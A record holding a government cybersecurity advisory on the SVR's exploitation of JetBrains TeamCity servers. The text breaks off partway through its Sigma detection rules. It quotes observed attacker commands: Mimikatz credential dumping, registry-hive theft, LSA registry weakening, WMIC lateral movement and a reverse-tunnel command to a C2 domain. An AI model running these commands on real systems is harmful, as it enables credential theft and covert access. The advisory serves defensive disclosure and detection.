{
	"id": "5f56ec63-d5bf-41a0-ab66-4c02829e3aac",
	"created_at": "2026-04-06T00:13:04.65369Z",
	"updated_at": "2026-04-10T03:37:50.156246Z",
	"deleted_at": null,
	"sha1_hash": "a90da8d6f7f0c84257a2dc2fdd6f05c86b48bd8f",
	"title": "Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 332085,
	"plain_text": "Russian Foreign Intelligence Service (SVR) Exploiting JetBrains\r\nTeamCity CVE Globally | CISA\r\nPublished: 2023-12-13 · Archived: 2026-04-05 14:27:46 UTC\r\nSUMMARY\r\nThe U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity \u0026 Infrastructure Security Agency (CISA),\r\nU.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska\r\n(CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service\r\n(SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and\r\nNOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting\r\nJetBrains TeamCity software since September 2023.\r\nSoftware developers use TeamCity software to manage and automate software compilation, building, testing, and\r\nreleasing. If compromised, access to a TeamCity server would provide malicious actors with access to that\r\nsoftware developer’s source code, signing certificates, and the ability to subvert software compilation and\r\ndeployment processes—access a malicious actor could further use to conduct supply chain operations. Although\r\nthe SVR used such access to compromise SolarWinds and its customers in 2020, the limited number and seemingly\r\nopportunistic types of victims currently identified indicate that the SVR has not used the access afforded by the\r\nTeamCity CVE in a similar manner. 
The SVR has, however, been observed using the initial access gleaned by\r\nexploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take\r\nother steps to ensure persistent and long-term access to the compromised network environments.\r\nTo bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most\r\nrecent compromise to aid organizations in conducting their own investigations and securing their networks,\r\nprovide compromised entities with actionable indicators of compromise (IOCs), and empower private sector\r\ncybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies\r\nrecommend all organizations with affected systems that did not immediately apply available patches or\r\nworkarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA. If\r\npotential compromise is detected, administrators should apply the incident response recommendations included in\r\nthis CSA and report key findings to the FBI and CISA.\r\nDownload the PDF version of this report:\r\nFor a downloadable copy of IOCs, see:\r\nTHREAT OVERVIEW\r\nSVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013,\r\ncybersecurity companies and governments have reported on SVR operations targeting victim networks to steal\r\nconfidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 1 of 25\n\npattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia\r\nencompasses information on the politics, economics, and military of foreign states; science and technology; and\r\nforeign counterintelligence. 
The SVR also conducts cyber operations targeting technology companies that enable\r\nfuture cyber operations.\r\nA decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations,\r\ntargeting government agencies, think tanks and policy analysis organizations, educational institutions, and\r\npolitical organizations. This category of targeting is consistent with the SVR’s responsibility to collect political\r\nintelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government,\r\npolitical intelligence includes not only the development and execution of foreign policies, but also the\r\ndevelopment and execution of domestic policies and the political processes that drive them. In December 2016,\r\nthe U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber\r\nActivity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election.\r\nThe SVR’s use of spear phishing operations is visible today in its ongoing Diplomatic Orbiter campaign,\r\nprimarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing\r\ntools and techniques used by the SVR to target embassies in dozens of countries.\r\nLess frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence\r\ncollection mission. In July 2020, the U.S., U.K., and Canadian Governments jointly published an advisory revealing\r\nthe SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known\r\nas WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine\r\ndevelopment. Although the 2020 advisory did not mention it, the authoring agencies can now disclose\r\nthat the SVR’s WellMess campaign also targeted energy companies. 
Such biomedical and energy targets are\r\nconsistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign\r\nintelligence known as economic intelligence and science and technology.\r\nIn April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information\r\ntechnology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since\r\nat least 2018, expanded the range of its cyber operations to include the widespread targeting of information\r\ntechnology companies. At least some of this targeting was aimed at enabling additional cyber operations.\r\nFollowing this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR\r\nTTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques\r\nto gain initial access to some victims’ networks, exploitation of a zero-day vulnerability, and exploitation of Microsoft\r\n365 cloud environments.\r\nIn this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues\r\nits practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a vulnerability in a software development\r\nprogram, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the\r\nthreat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE\r\nin mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable\r\nTeamCity servers. 
While the authoring agencies assess the SVR has not yet used its accesses to software\r\ndevelopers to access customer networks and is likely still in the preparatory phase of its operation, having access\r\nto these companies’ networks presents the SVR with opportunities to enable hard-to-detect command and control\r\n(C2) infrastructure.\r\nTECHNICAL DETAILS\r\nNote: This advisory uses the MITRE ATT\u0026CK® for Enterprise framework, version 14. See the MITRE\r\nATT\u0026CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK®\r\ntactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT\u0026CK framework,\r\nsee CISA and MITRE ATT\u0026CK’s Best Practices for MITRE ATT\u0026CK Mapping and CISA’s Decider Tool.\r\nWhile the SVR followed a similar playbook in each compromise, it also adjusted to each operating environment,\r\nand not all of the steps or actions presented below were executed on every host.\r\nInitial Access - Exploitation\r\nThe SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190] in late September 2023\r\nusing CVE-2023-42793, which enables the insecure handling of specific paths allowing for bypassing\r\nauthorization, resulting in arbitrary code execution on the server. The authoring agencies' observations show that\r\nthe TeamCity exploitation usually resulted in code execution [T1203] with high privileges, granting the SVR an\r\nadvantageous foothold in the network environment. 
The authoring agencies are not currently aware of any other\r\ninitial access vector to JetBrains TeamCity being exploited by the SVR.\r\nHost Reconnaissance\r\nInitial observations show the SVR used the following basic, built-in commands to perform host reconnaissance\r\n[T1033], [T1059.003], [T1592.002]:\r\nwhoami /priv\r\nwhoami /all\r\nwhoami /groups\r\nwhoami /domain\r\nnltest -dclist\r\nnltest -dsgetdc\r\ntasklist\r\nnetstat\r\nwmic /node:\"\u003credacted\u003e\" /user:\"\u003credacted\u003e\" /password:\"\u003credacted\u003e\" process list brief\r\nwmic /node:\"\u003credacted\u003e\" process list brief\r\nwmic process get commandline -all\r\nwmic process \u003cproc_id\u003e get commandline\r\nwmic process where name=\"GoogleCrashHandler64.exe\" get commandline,processed\r\npowershell ([adsisearcher]\"((samaccountname=\u003credacted\u003e))\").Findall().Properties\r\npowershell ([adsisearcher]\"((samaccountname=\u003credacted\u003e))\").Findall().Properties.memberof\r\npowershell Get-WmiObject -Class Win32_Service -Computername\r\npowershell Get-WindowsDriver -Online -All\r\nFile Exfiltration\r\nAdditionally, the authoring agencies have observed the SVR exfiltrating files [T1041] which may provide\r\ninsight into the host system’s operating system:\r\nC:\\Windows\\system32\\ntoskrnl.exe to precisely identify the system version, likely as a prerequisite to deploy\r\nEDRSandBlast.\r\nSQL Server executable files - based on the review of the post exploitation actions, the SVR showed an\r\ninterest in specific files of the SQL Server installed on the compromised systems:\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqlmin.dll,\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllos.dll,\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllang.dll,\r\nC:\\Program 
Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqltses.dll\r\nC:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\secforwarder.dll\r\nVisual Studio files – based on the review of the post exploitation actions, the SVR showed an interest in\r\nspecific files of Visual Studio:\r\nC:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\SQL\\Common7\\IDE\\VSIXAutoUpdate.exe\r\nUpdate management agent files – based on the review of the post exploitation actions, the SVR\r\nshowed an interest in executables and configuration of patch management software:\r\nC:\\Program Files (x86)\\PatchManagementInstallation\\Agent\\12\\Httpd\\bin\\httpd.exe\r\nC:\\Program Files (x86)\\PatchManagementInstallation\\Agent\\12\\Httpd\r\nC:\\ProgramData\\GFI\\LanGuard 12\\HttpdConfig\\httpd.conf\r\nInterest in SQL Server\r\nBased on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001], [T1505.001]:\r\npowershell Compress-Archive -Path \"C:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqlmin.dll\",\"C:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllos.dll\",\"C:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqllang.dll\",\"C:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqltses.dll\" -DestinationPath C:\\Windows\\temp\\1\\sql.zip\r\nSVR cyber actors also exfiltrated secforwarder.dll.\r\nTactics Used to Avoid Detection\r\nTo avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or\r\noutright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001].\r\nThis was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the\r\nSVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and\r\nprotecting running processes and 
protecting them from infection. The actors then inject code into AV/EDR\r\nprocesses for a small subset of victims [T1068]. Additionally, executables that are likely to be detected (e.g.,\r\nMimikatz) were executed in memory [T1003.001].\r\nIn several cases, the SVR attempted to hide its backdoors via:\r\nAbusing a DLL hijacking vulnerability in Zabbix software by replacing a legitimate Zabbix DLL with\r\none containing the GraphicalProton backdoor,\r\nBackdooring an open source application developed by Microsoft named vcperf. The SVR modified and copied\r\npublicly available source code. After execution, backdoored vcperf dropped several DLLs to disk, one of\r\nthose being a GraphicalProton backdoor,\r\nAbusing a DLL hijacking vulnerability in Webroot antivirus software by replacing a legitimate DLL with\r\none containing the GraphicalProton backdoor.\r\nTo avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive\r\nand Dropbox cloud services. To further enable obfuscation, data exchanged with malware via OneDrive and\r\nDropbox were hidden inside randomly generated BMP files [T1564], illustrated below:\r\nPrivilege Escalation\r\nTo facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLMHash\r\nregistry key modification, and the Mimikatz tool.\r\nThe SVR modified the NoLMHash registry key using the following reg command:\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v NoLMHash /t REG_DWORD /d \"0\" /f\r\nThe SVR used the following Mimikatz commands [T1003]:\r\nprivilege::debug\r\nlsadump::cache\r\nlsadump::secrets\r\nlsadump::sam\r\nsekurlsa::logonpasswords\r\nPersistence\r\nThe SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. 
Depending on the\r\nprivileges the SVR had, its executables were stored in one of the following directories:\r\nC:\\Windows\\temp\r\nC:\\Windows\\System32\r\nC:\\Windows\\WinStore\r\nThe SVR made all modifications using the schtasks.exe binary. It used multiple variants of arguments passed\r\nto schtasks.exe, which can be found in Appendix B – Indicators of Compromise.\r\nTo secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets\r\n(TGTs) [T1558.001].\r\nSensitive Data Exfiltration [T1020]\r\nThe SVR exfiltrated the following Windows Registry hives from its victims [T1003]:\r\nHKLM\\SYSTEM\r\nHKLM\\SAM\r\nHKLM\\SECURITY\r\nIn order to exfiltrate the Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then\r\nexfiltrated them using a backdoor capability. It used “reg save” to save the SYSTEM, SAM, and SECURITY registry\r\nhives, and used PowerShell to stage .zip archives in the C:\\Windows\\Temp\\ directory.\r\nreg save HKLM\\SYSTEM \"C:\\Windows\\temp\\1\\sy.sa\" /y\r\nreg save HKLM\\SAM \"C:\\Windows\\temp\\1\\sam.sa\" /y\r\nreg save HKLM\\SECURITY \"C:\\Windows\\temp\\1\\se.sa\" /y\r\npowershell Compress-Archive -Path C:\\Windows\\temp\\1\\ -DestinationPath C:\\Windows\\temp\\s.zip -Force \u0026 del C:\\Windows\\temp\\1 /F /Q\r\nIn a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session\r\ncookies, browsing history, or saved logins.\r\nThe SVR also used the DSInternals open source tool to interact with Directory Services. DSInternals allows obtaining\r\nsensitive domain information.\r\nNetwork Reconnaissance\r\nAfter the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on\r\nnetwork reconnaissance [T1590.004]. 
The SVR performed network reconnaissance using a mix of built-in\r\ncommands and additional tools, such as a port scanner and PowerSploit, which it launched into memory [T1046].\r\nThe SVR executed the following PowerSploit commands:\r\nGet-NetComputer\r\nGet-NetGroup\r\nGet-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount\r\nGet-NetDiDomain\r\nGet-AdUser\r\nGet-DomainUser -UserName\r\nGet-NetUser -PreauthNotRequire\r\nGet-NetComputer | select samaccountname\r\nGet-NetUser -SPN | select serviceprincipalname\r\nTunneling into Compromised Environments\r\nIn selected environments the SVR used an additional tool named “rr.exe”—a modified open source reverse socks\r\ntunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572].\r\nThe authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:\r\n65.20.97[.]203:443\r\nPoetpages[.]com:8443\r\nThe SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command\r\nLine (WMIC) [T1047] utility after dropping it to disk:\r\nwmic process call create \"C:\\Program Files\\Windows Defender Advanced Threat Protection\\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31\"\r\nLateral Movement\r\nThe SVR used WMIC to facilitate lateral movement [T1047], [T1210].\r\nwmic /node:\"\u003credacted\u003e\" /user:\"\u003credacted\u003e\" /password:\"\u003credacted\u003e\" process call create \"rundll32 C:\\Windows\\system32\\AclNumsInvertHost.dll AclNumsInvertHost\"\r\nThe SVR also modified the DisableRestrictedAdmin key to enable remote connections [T1210].\r\nIt modified the registry using the following reg command:\r\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d \"0\" /f\r\nAdversary Toolset\r\nIn the 
course of the TeamCity operation, the SVR used multiple custom and publicly available open source tools and\r\nbackdoors. The following custom tools were observed in use during the operation:\r\nGraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs\r\n[T1027.001] to exchange data with the SVR operator.\r\nAfter execution, GraphicalProton gathers environment information such as active TCP/UDP connections\r\n[T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is\r\nused as a primary communication channel while Dropbox is treated as a backup channel [T1567]. API\r\nkeys are hardcoded into the malware. When communicating with cloud services,\r\nGraphicalProton generates a randomly named directory which is used to store infection-specific BMP files\r\n- with both commands and results [T1564.001]. The directory name is re-randomized each time the\r\nGraphicalProton process is started.\r\nBMP files that were used to exchange data were generated in the following way:\r\n1. Compress data using zlib,\r\n2. Encrypt data using a custom algorithm,\r\n3. Add the “***” string literal to the encrypted data,\r\n4. Create a random BMP with a random rectangle,\r\n5. And finally, encode the encrypted data within the lower pixel bits.\r\nWhile the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to\r\navoid detection the adversary wrapped the tool in various layers of obfuscation, encryption, encoders,\r\nand stagers. 
Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses\r\nDLL hijacking [T1574.002] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036], an open-source C++ build analysis tool\r\nfrom Microsoft.\r\nGraphicalProton HTTPS variant – a variant of the GraphicalProton backdoor recently introduced by the\r\nSVR that forgoes using cloud-based services as a C2 channel and instead relies on HTTP requests.\r\nTo legitimize the C2 channel, the SVR used a re-registered expired domain set up with a dummy WordPress\r\nwebsite. Execution of the HTTPS variant of GraphicalProton is split into two files – a stager and an encrypted\r\nbinary file that contains further code.\r\nMITRE ATT\u0026CK TACTICS AND TECHNIQUES\r\nSee the tables below for all referenced threat actor tactics and techniques in this advisory. For additional mitigations,\r\nsee the Mitigations section.\r\nTable 1: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise - Reconnaissance\r\nTechnique Title | ID | Use\r\nGather Victim Network Information: Network Topology | T1590.004 | SVR cyber actors may gather information about the victim’s network topology that can be used during targeting.\r\nGather Victim Host Information: Software | T1592.002 | SVR cyber actors may gather information about the victim’s host networks that can be used during targeting.\r\nTable 2: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise – Initial Access\r\nTechnique Title | ID | Use\r\nExploit Public-Facing Application | T1190 | SVR cyber actors exploit internet-connected JetBrains TeamCity server using CVE-2023-42793 for initial access.\r\nTable 3: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Execution\r\nTechnique Title | ID | Use\r\nCommand and Scripting Interpreter: PowerShell | T1059.001 | SVR 
cyber actors used PowerShell commands to compress Microsoft SQL Server .dll files.\r\nCommand and Scripting Interpreter: Windows Command Shell | T1059.003 | SVR cyber actors execute these powershell commands to perform host reconnaissance:\r\npowershell ([adsisearcher]\"((samaccountname=\u003credacted\u003e))\").Findall().Properties\r\npowershell ([adsisearcher]\"((samaccountname=\u003credacted\u003e))\").Findall().Properties.memberof\r\npowershell Get-WmiObject -Class Win32_Service -Computername\r\npowershell Get-WindowsDriver -Online -All\r\nExploitation for Client Execution | T1203 | SVR cyber actors leverage arbitrary code execution after exploiting CVE-2023-42793.\r\nHijack Execution Flow: DLL Side-Loading | T1574.002 | SVR cyber actors use a variant of GraphicalProton that uses DLL hijacking in Zabbix as a means to start execution.\r\nTable 4: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Persistence\r\nTechnique Title | ID | Use\r\nScheduled Task | T1053.005 | SVR cyber actors may abuse Windows Task Schedule to perform task scheduling for initial or recurring execution of malicious code.\r\nServer Software Component: SQL Stored Procedures | T1505.001 | SVR cyber actors abuse SQL server stored procedures to maintain persistence.\r\nBoot or Logon Autostart Execution | T1547 | SVR cyber actors used C:\\Windows\\system32\\ntoskrnl.exe to configure automatic system boot settings to maintain persistence.\r\nTable 5: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Privilege Escalation\r\nTechnique Title | ID | Use\r\nExploitation for Privilege Escalation | T1068 | SVR cyber actors exploit JetBrains TeamCity vulnerability to achieve escalated privileges. To avoid detection, the SVR cyber actors used a “Bring Your Own Vulnerable Driver” technique to disable EDR and AV defense mechanisms.\r\nAccount Manipulation | T1098 | SVR cyber actors may manipulate accounts to maintain and/or elevate access to victim systems.\r\nTable 6: SVR Cyber Actors’ ATT\u0026CK Techniques for Enterprise: Defense Evasion\r\nTechnique Title | ID | Use\r\nObfuscated Files or Information: Binary Padding | T1027.001 | SVR cyber actors use BMPs to perform binary padding while exchanged data is exfiltrated to their C2 station.\r\nMasquerading | T1036 | SVR cyber actors use a variant that uses DLL hijacking in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an open-source C++ build analysis tool from Microsoft.\r\nProcess Injection | T1055 | SVR cyber actors inject code into AV and EDR processes to evade defenses.\r\nDisable or Modify Tools | T1562.001 | SVR cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.\r\nHide Artifacts | T1564 | SVR cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.\r\nHide Artifacts: Hidden Files and Directories | T1564.001 | When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files - with both commands and results.\r\nTable 7: SVR Cyber actors’ ATT\u0026CK Techniques for Enterprise: Credential Access\r\nTechnique Title | ID | Use\r\nOS Credential Dumping: LSASS Memory | T1003.001 | SVR cyber actors executed Mimikatz commands in memory to gain access to credentials stored in memory.\r\nOS Credential Dumping: Security Account Manager | T1003.002 | SVR cyber actors used the following Mimikatz commands to gain access to credentials:\r\nprivilege::debug\r\nlsadump::cache\r\nlsadump::secrets\r\nlsadump::sam\r\nsekurlsa::logonpasswords\r\nAdditionally, SVR cyber actors exfiltrated Windows registry hives to steal credentials:\r\nHKLM\\SYSTEM\r\nHKLM\\SAM\r\nHKLM\\SECURITY\r\nCredentials from Password Stores: Credentials from Web Browsers | T1555.003 | In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.\r\nSteal or Forge Kerberos Tickets: Golden Ticket | T1558.001 | To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs).\r\nTable 8: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Discovery\r\nTechnique Title | ID | Use\r\nSystem Owner/User Discovery | T1033 | SVR cyber actors use these built-in commands to perform host reconnaissance: whoami /priv, whoami /all, whoami /groups, whoami /domain to perform user discovery.\r\nNetwork Service Discovery | T1046 | SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as a port scanner and PowerSploit.\r\nProcess Discovery | T1057 | SVR cyber actors use GraphicalProton to gather running processes data.\r\nGather Victim Network Information | T1590 | SVR cyber actors use GraphicalProton to gather victim network information.\r\nTable 9: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Lateral Movement\r\nTechnique Title | ID | Use\r\nExploitation of Remote Services | T1210 | SVR cyber actors may exploit remote services to gain unauthorized access to internal systems once inside a network.\r\nWindows Management Instrumentation | T1047 | SVR cyber actors executed Rsockstun either in memory or using Windows Management Instrumentation (WMI) to execute malicious commands and payloads.\r\nwmic process call create \"C:\\Program Files\\Windows Defender Advanced Threat Protection\\Sense.exe -connect poetpages.com 
-pass M554-0sddsf2@34232fsl45t31\"\r\nTable 10: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Command and Control\r\nTechnique Title | ID | Use\r\nDynamic Resolution | T1568 | SVR may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations.\r\nProtocol Tunneling | T1572 | SVR cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. In selected environments, the SVR used an additional tool named “rr.exe”—a modified open source reverse socks tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure.\r\nTable 11: SVR Cyber Actors ATT\u0026CK Techniques for Enterprise: Exfiltration\r\nTechnique Title | ID | Use\r\nAutomated Exfiltration | T1020 | SVR cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during collection.\r\nExfiltration Over C2 Channel | T1041 | SVR cyber actors may steal data by exfiltrating it over an existing C2 channel. Stolen data is encoded into normal communications using the same protocol as C2 communications.\r\nExfiltration Over Web Service | T1567 | SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2 station.\r\nINDICATORS OF COMPROMISE\r\nNote: Please refer to Appendix B for a list of IOCs.\r\nVICTIM TYPES\r\nAs a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified\r\na few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a\r\nhundred compromised devices, though we assess this list does not represent the full set of compromised\r\norganizations. 
Generally, the victim types do not fit into any sort of pattern or trend, aside from having an\r\nunpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that the SVR’s exploitation of\r\nthese victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims\r\nincluded: an energy trade association; companies that provide software for billing, medical devices, customer care,\r\nemployee monitoring, financial management, marketing, sales, and video games; as well as hosting companies,\r\ntools manufacturers, and small and large IT companies.\r\nDETECTION METHODS\r\nThe following rules can be used to detect activity linked to this adversary. These rules should serve as\r\nexamples and be adapted to each organization’s environment and telemetry.\r\nSIGMA Rules\r\ntitle: Privilege information listing via whoami\r\ndescription: Detects whoami.exe execution and listing of privileges\r\nauthor:\r\nreferences: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    Image|endswith:\r\n     - 'whoami.exe'\r\n    CommandLine|contains:\r\n     - 'priv'\r\n     - 'PRIV'\r\n  condition: selection\r\nfalsepositives: legitimate use by system administrator\r\ntitle: DC listing via nltest\r\ndescription: Detects nltest.exe execution and DC listing\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    Image|endswith:\r\n     - 'nltest.exe'\r\n    CommandLine|re: '.*dclist\\:.*|.*DCLIST\\:.*|.*dsgetdc\\:.*|.*DSGETDC\\:.*'\r\n  condition: selection\r\nfalsepositives: legitimate use by system 
administrator\r\ntitle: DLL execution via WMI\r\ndescription: Detects DLL execution via WMI\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    Image|endswith:\r\n     - 'WMIC.exe'\r\n    CommandLine|contains|all:\r\n     - 'call'\r\n     - 'rundll32'\r\n  condition: selection\r\nfalsepositives: legitimate use by software or system administrator\r\ntitle: Process with connect and pass as args\r\ndescription: Process with connect and pass as args\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    CommandLine|contains|all:\r\n     - 'pass'\r\n     - 'connect'\r\n  condition: selection\r\nfalsepositives: legitimate use of rsockstun or software with exact same arguments\r\ntitle: Service or Drive enumeration via powershell\r\ndescription: Service or Drive enumeration via powershell\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 14 of 25\n\ncategory: ps_script\r\nproduct: windows\r\ndetection:\r\n  selection_1:\r\n      ScriptBlockText|contains|all:\r\n      - 'Get-WmiObject'\r\n      - '-Class'\r\n      - 'Win32_Service'\r\n  selection_2:\r\n      ScriptBlockText|contains|all:\r\n      - 'Get-WindowsDriver'\r\n      - '-Online'\r\n      - '-All'\r\n  condition: selection_1 or selection_2\r\nfalsepositives: legitimate use by system administrator\r\ntitle: Compressing files from temp to temp\r\ndescription: Compressing files from temp\\ to temp used by SVR to prepare data to be exfiltrated\r\nreferences:\r\nauthor:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: ps_script\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    ScriptBlockText|re: '.*Compress\\-Archive.*Path.*Windows\\\\[Tt]{1}emp\\\\[1-9]\r\n{1}.*DestinationPath.*Windows\\\\[Tt]{1}emp\\\\.*'\r\n  condition: 
selection\r\ntitle: DLL names used by SVR for GraphicalProton backdoor\r\ndescription: Hunts for known SVR-specific DLL names.\r\nreferences:\r\nauthor:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: image_load\r\n  product: windows\r\ndetection:\r\n  selection:\r\n    ImageLoaded|endswith:\r\n     - 'AclNumsInvertHost.dll'\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 15 of 25\n\n- 'ModeBitmapNumericAnimate.dll'\r\n- 'UnregisterAncestorAppendAuto.dll'\r\n     - 'DeregisterSeekUsers.dll'\r\n     - 'ScrollbarHandleGet.dll'\r\n     - 'PerformanceCaptionApi.dll'\r\n     - 'WowIcmpRemoveReg.dll'\r\n     - 'BlendMonitorStringBuild.dll'\r\n     - 'HandleFrequencyAll.dll'\r\n     - 'HardSwapColor.dll'\r\n     - 'LengthInMemoryActivate.dll'\r\n     - 'ParametersNamesPopup.dll'\r\n     - 'ModeFolderSignMove.dll'\r\n     - 'ChildPaletteConnected.dll'\r\n     - 'AddressResourcesSpec.dll'\r\n  condition: selection\r\ntitle: Sensitive registry entries saved to file\r\ndescription: Sensitive registry entries saved to file\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n  category: process_creation\r\n  product: windows\r\ndetection:\r\n  selection_base:\r\n    Image|endswith:\r\n     - 'reg.exe'\r\n    CommandLine|contains: 'save'\r\n    CommandLine|re: '.*HKLM\\\\SYSTEM.*|.*HKLM\\\\SECURITY.*|.*HKLM\\\\SAM.*'\r\n  selection_file:\r\n   CommandLine|re: '.*sy\\.sa.*|.*sam\\.sa.*|.*se\\.sa.*'\r\n  condition: selection_base and selection_file\r\ntitle: Scheduled tasks names used by SVR for GraphicalProton backdoor\r\ndescription: Hunts for known SVR-specific scheduled task 